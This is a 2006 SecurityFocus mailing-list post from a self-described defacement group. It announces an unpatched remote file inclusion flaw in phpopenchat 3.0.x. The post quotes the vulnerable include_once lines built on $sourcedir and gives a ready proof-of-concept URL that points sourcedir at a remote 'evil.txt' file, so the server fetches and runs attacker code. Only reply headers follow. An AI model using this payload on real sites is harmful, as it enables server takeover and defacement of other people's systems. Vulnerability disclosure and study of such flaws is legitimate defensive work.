SecurityFocus

WDT :-phpopenchat-3.0.* ($sourcedir) Remote File Inclusion Exploit Sep 06 2006 07:17PM
stormhacker hotmail com (1 replies)

[W]orld [D]efacers Team

--------------------Summary----------------

eVuln ID: WD23

Vendor: phpopenchat-3.0.*

Vendor's Web Site: http://phpopenchat.org

Class: Remote

PoC/Exploit: Available

Solution: Not Available

Discovered by: rUnViRuS ( wdzone.net & worlddefacers.de )

-----------------Description---------------

include_once("QueryString.php");

include_once("Settings.php");

include_once("$sourcedir/Subs.php");

include_once("$sourcedir/Errors.php");

include_once("$sourcedir/Load.php");

//include_once("$sourcedir/Security.php");

--------------PoC/Exploit----------------------

http://www.host.com/phpopenchat/contrib/yabbse/poc.php?sourcedir=http://
host/evil.txt?

--------------Solution---------------------

No Patch available.

--------------Credit-----------------------

Discovered by: rUnViRuS (worlddefacers.de)

[ reply ]

Re: WDT :-phpopenchat-3.0.* ($sourcedir) Remote File Inclusion Exploit Sep 07 2006 10:18PM
Carsten Eilers (ceilers-lists gmx de) (1 replies)

AW: WDT :-phpopenchat-3.0.* ($sourcedir) Remote File Inclusion Exploit Sep 08 2006 01:14AM
Frank Reißner (mail frank-reissner de) (1 replies)

Re: WDT :-phpopenchat-3.0.* ($sourcedir) Remote File Inclusion Exploit Sep 08 2006 06:57AM
Carsten Eilers (ceilers-lists gmx de)